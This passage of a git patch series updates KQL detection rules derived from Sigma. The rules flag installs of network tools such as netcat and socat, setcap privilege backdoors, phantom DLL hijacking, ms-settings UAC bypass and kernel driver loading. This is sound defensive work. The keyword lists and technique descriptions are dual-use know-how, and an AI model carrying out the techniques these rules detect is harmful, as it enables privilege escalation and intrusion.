"tshark" or ProcessCommandLine contains "openconnect" or ProcessCommandLine contains "proxychains") \ No newline at end of file +| where ((ProcessCommandLine contains "install" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--install" or ProcessCommandLine contains "-i") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains "-i" and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "localinstall" or ProcessCommandLine contains "install") and FolderPath endswith "/yum")) and (ProcessCommandLine contains "nmap" or ProcessCommandLine contains " nc" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "wireshark" or ProcessCommandLine contains "tshark" or ProcessCommandLine contains "openconnect" or ProcessCommandLine contains "proxychains" or ProcessCommandLine contains "socat") \ No newline at end of file diff --git a/sigma b/sigma index c8b1a0ff..6fe7343b 160000 --- a/sigma +++ b/sigma @@ -1 +1 @@ -Subproject commit c8b1a0ff67b77718d7030278d8e955f621df9b6b +Subproject commit 6fe7343bf79306884b05837d5e03bcbcb141ce50 From 8ebdace3df6f6e5efe7fa94ee98bc8291411bd27 Mon Sep 17 00:00:00 2001 From: Khadinxc <89855993+Khadinxc@users.noreply.github.com> Date: Sun, 25 Jan 2026 02:48:11 +0000 Subject: [PATCH 17/17] chore: update KQL rules from latest Sigma rules --- .../capabilities_discovery_linux.kql | 2 +- ...ability_set_on_a_binary_via_setcap_utility.kql | 12 ++++++++++++ ...ability_set_on_a_binary_via_setcap_utility.kql | 12 ++++++++++++ .../creation_of_non_existent_system_dll.kql | 7 ++++--- .../wmic_loading_scripting_libraries.kql | 1 + ...con_execution_disabling_vmware_vmci_device.kql | 15 +++++++++++++++ .../pua_kernel_driver_utility_kdu_execution.kql | 14 ++++++++++++++ ...dification_of_ms_settings_protocol_handler.kql | 11 +++++++++++ ...ckage_support_framework_ai_stubs_execution.kql | 13 +++++++++++++ ...istry_modification_for_oci_dll_redirection.kql | 13 +++++++++++++ ...s_shell_open_command_registry_modification.kql | 14 ++++++++++++++ sigma | 2 +- 12 files changed, 111 insertions(+), 5 deletions(-) create mode 100644 KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql create mode 100644 KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql create mode 100644 KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql create mode 100644 KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql create mode 100644 KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql create mode 100644 KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql create mode 100644 KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql create mode 100644 KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql diff --git a/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql b/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql index 30c6e8d6..d661373c 100644 --- a/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql +++ b/KQL/rules/linux/process_creation/capabilities_discovery_linux.kql @@ -7,4 +7,4 @@ // Tags: attack.discovery, attack.t1083 DeviceProcessEvents -| where (ProcessCommandLine contains " -r " or ProcessCommandLine contains " /r " or ProcessCommandLine contains " –r " or ProcessCommandLine contains " —r " or ProcessCommandLine contains " ―r ") and FolderPath endswith "/getcap" \ No newline at end of file +| where ProcessCommandLine contains " -r " and FolderPath endswith "/getcap" \ No newline at end of file diff --git a/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql b/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql new file mode 100644 index 00000000..090fbbb5 --- /dev/null +++ b/KQL/rules/linux/process_creation/linux_setgid_capability_set_on_a_binary_via_setcap_utility.kql @@ -0,0 +1,12 @@ +// Title: Linux Setgid Capability Set on a Binary via Setcap Utility +// Author: Luc Génaux +// Date: 2026-01-24 +// Level: low +// Description: Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. +// This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group). +// This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548, attack.t1554 + +DeviceProcessEvents +| where ProcessCommandLine contains "cap_setgid" and FolderPath endswith "/setcap" \ No newline at end of file diff --git a/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql b/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql new file mode 100644 index 00000000..e8356003 --- /dev/null +++ b/KQL/rules/linux/process_creation/linux_setuid_capability_set_on_a_binary_via_setcap_utility.kql @@ -0,0 +1,12 @@ +// Title: Linux Setuid Capability Set on a Binary via Setcap Utility +// Author: Luc Génaux +// Date: 2026-01-24 +// Level: low +// Description: Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. +// This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user). +// This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548, attack.t1554 + +DeviceProcessEvents +| where ProcessCommandLine contains "cap_setuid" and FolderPath endswith "/setcap" \ No newline at end of file diff --git a/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql b/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql index 15ac98c8..82b26e2b 100644 --- a/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql +++ b/KQL/rules/windows/file/file_event/creation_of_non_existent_system_dll.kql @@ -2,10 +2,11 @@ // Author: Nasreddine Bencherchali (Nextron Systems), fornotes // Date: 2022-12-01 // Level: medium -// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). -// Usually this technique is used to achieve DLL hijacking. +// Description: Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes. +// Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs. +// Thus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 DeviceFileEvents -| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll" \ No newline at end of file +| where FolderPath endswith ":\\Windows\\System32\\axeonoffhelper.dll" or FolderPath endswith ":\\Windows\\System32\\cdpsgshims.dll" or FolderPath endswith ":\\Windows\\System32\\oci.dll" or FolderPath endswith ":\\Windows\\System32\\offdmpsvc.dll" or FolderPath endswith ":\\Windows\\System32\\shellchromeapi.dll" or FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll" \ No newline at end of file diff --git a/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql index 07306e40..99e37d51 100644 --- a/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql +++ b/KQL/rules/windows/image_load/wmic_loading_scripting_libraries.kql @@ -3,6 +3,7 @@ // Date: 2020-10-17 // Level: medium // Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). +// It could be an indicator of SquiblyTwo technique, which uses Windows Management Instrumentation (WMI) to execute malicious code. // MITRE Tactic: Defense Evasion // Tags: attack.defense-evasion, attack.t1220 // False Positives: diff --git a/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql b/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql new file mode 100644 index 00000000..d0fa7173 --- /dev/null +++ b/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql @@ -0,0 +1,15 @@ +// Title: Devcon Execution Disabling VMware VMCI Device +// Author: Matt Anderson, Dray Agha, Anna Pham (Huntress) +// Date: 2026-01-02 +// Level: high +// Description: Detects execution of devcon.exe with commands that disable the VMware Virtual Machine Communication Interface (VMCI) device. +// This can be legitimate during VMware Tools troubleshooting or driver conflicts, but may also indicate malware attempting to hijack communication with the hardware via the VMCI device. +// This has been used to facilitate VMware ESXi vulnerability exploits to escape VMs and execute code on the ESXi host. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1543.003, attack.t1562.001 +// False Positives: +// - Legitimate VMware administration, Tools installation/uninstallation, or troubleshooting driver conflicts. +// - Automated scripts in virtualized environments for device cleanup. + +DeviceProcessEvents +| where ProcessCommandLine contains " disable " and (FolderPath endswith "\\devcon.exe" or ProcessVersionInfoOriginalFileName =~ "DevCon.exe") and (ProcessCommandLine contains "15AD&DEV_0740" or ProcessCommandLine contains "VMWVMCIHOSTDEV") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql b/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql new file mode 100644 index 00000000..c7b2e1eb --- /dev/null +++ b/KQL/rules/windows/process_creation/pua_kernel_driver_utility_kdu_execution.kql @@ -0,0 +1,14 @@ +// Title: PUA - Kernel Driver Utility (KDU) Execution +// Author: Matt Anderson, Dray Agha, Anna Pham (Huntress) +// Date: 2026-01-02 +// Level: high +// Description: Detects execution of the Kernel Driver Utility (KDU) tool. +// KDU can be used to bypass driver signature enforcement and load unsigned or malicious drivers into the Windows kernel. +// Potentially allowing for privilege escalation, persistence, or evasion of security controls. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Legitimate driver development, testing, or administrative troubleshooting (e.g., enabling/disabling hardware) + +DeviceProcessEvents +| where (ProcessCommandLine contains "-map " or ProcessCommandLine contains "-prv " or ProcessCommandLine contains "-dse " or ProcessCommandLine contains "-ps ") and ((FolderPath endswith "\\kdu.exe" or FolderPath endswith "\\hamakaze.exe") or ProcessVersionInfoOriginalFileName =~ "hamakaze.exe") \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql b/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql new file mode 100644 index 00000000..b4bd0d6c --- /dev/null +++ b/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql @@ -0,0 +1,11 @@ +// Title: Registry Modification of MS-settings Protocol Handler +// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2021-12-20 +// Level: medium +// Description: Detects registry modifications to the 'ms-settings' protocol handler, which is frequently targeted for UAC bypass or persistence. +// Attackers can modify this registry to execute malicious code with elevated privileges by hijacking the command execution path. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1548.002, attack.t1546.001, attack.t1112 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or ((ProcessCommandLine contains "New-ItemProperty" or ProcessCommandLine contains "Set-ItemProperty" or ProcessCommandLine contains "ni " or ProcessCommandLine contains "sp ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell.exe", "pwsh.dll"))))) and ProcessCommandLine contains "\\ms-settings\\shell\\open\\command" \ No newline at end of file diff --git a/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql b/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql new file mode 100644 index 00000000..2df2db29 --- /dev/null +++ b/KQL/rules/windows/process_creation/windows_msix_package_support_framework_ai_stubs_execution.kql @@ -0,0 +1,13 @@ +// Title: Windows MSIX Package Support Framework AI_STUBS Execution +// Author: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-03 +// Level: low +// Description: Detects execution of Advanced Installer MSIX Package Support Framework (PSF) components, specifically AI_STUBS executables with original filename 'popupwrapper.exe'. +// This activity may indicate malicious MSIX packages build with Advanced Installer leveraging the Package Support Framework to bypass application control restrictions. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218, attack.t1553.005, attack.t1204.002 +// False Positives: +// - Legitimate applications packaged with Advanced Installer using Package Support Framework + +DeviceProcessEvents +| where (FolderPath endswith "\\AI_STUBS\\AiStubX64Elevated.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX86Elevated.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX64.exe" or FolderPath endswith "\\AI_STUBS\\AiStubX86.exe") and ProcessVersionInfoOriginalFileName =~ "popupwrapper.exe" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql b/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql new file mode 100644 index 00000000..95e35eea --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/registry_modification_for_oci_dll_redirection.kql @@ -0,0 +1,13 @@ +// Title: Registry Modification for OCI DLL Redirection +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2026-01-24 +// Level: high +// Description: Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings. +// Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious DLL, facilitating phantom DLL hijacking via the MSDTC service. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.defense-evasion, attack.t1112, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLib" and (not(RegistryValueData contains "oci.dll"))) or (RegistryKey endswith "\\SOFTWARE\\Microsoft\\MSDTC\\MTxOCI\\OracleOciLibPath" and (not(RegistryValueData contains "%SystemRoot%\\System32\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql b/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql new file mode 100644 index 00000000..ebb6ec9e --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql @@ -0,0 +1,14 @@ +// Title: Suspicious Shell Open Command Registry Modification +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2026-01-24 +// Level: medium +// Description: Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence. +// Generally, modifications to the `*\shell\open\command` registry key can indicate an attempt to change the default action for opening files, +// and various UAC bypass or persistence techniques involve modifying these keys to execute malicious scripts or binaries. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1548.002, attack.t1546.001 +// False Positives: +// - Legitimate software installations or updates that modify the shell open command registry keys to these locations. + +DeviceRegistryEvents +| where (RegistryValueData contains "\\$Recycle.Bin\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Contacts\\" or RegistryValueData contains "\\Music\\" or RegistryValueData contains "\\PerfLogs\\" or RegistryValueData contains "\\Photos\\" or RegistryValueData contains "\\Pictures\\" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Videos\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%AppData%" or RegistryValueData contains "%LocalAppData%" or RegistryValueData contains "%Temp%" or RegistryValueData contains "%tmp%") and RegistryKey endswith "\\shell\\open\\command*" \ No newline at end of file diff --git a/sigma b/sigma index 6fe7343b..d5188c36 160000 --- a/sigma +++ b/sigma @@ -1 +1 @@ -Subproject commit 6fe7343bf79306884b05837d5e03bcbcb141ce50 +Subproject commit d5188c36a1c19eb101194a9c263a8e3ce285aa1e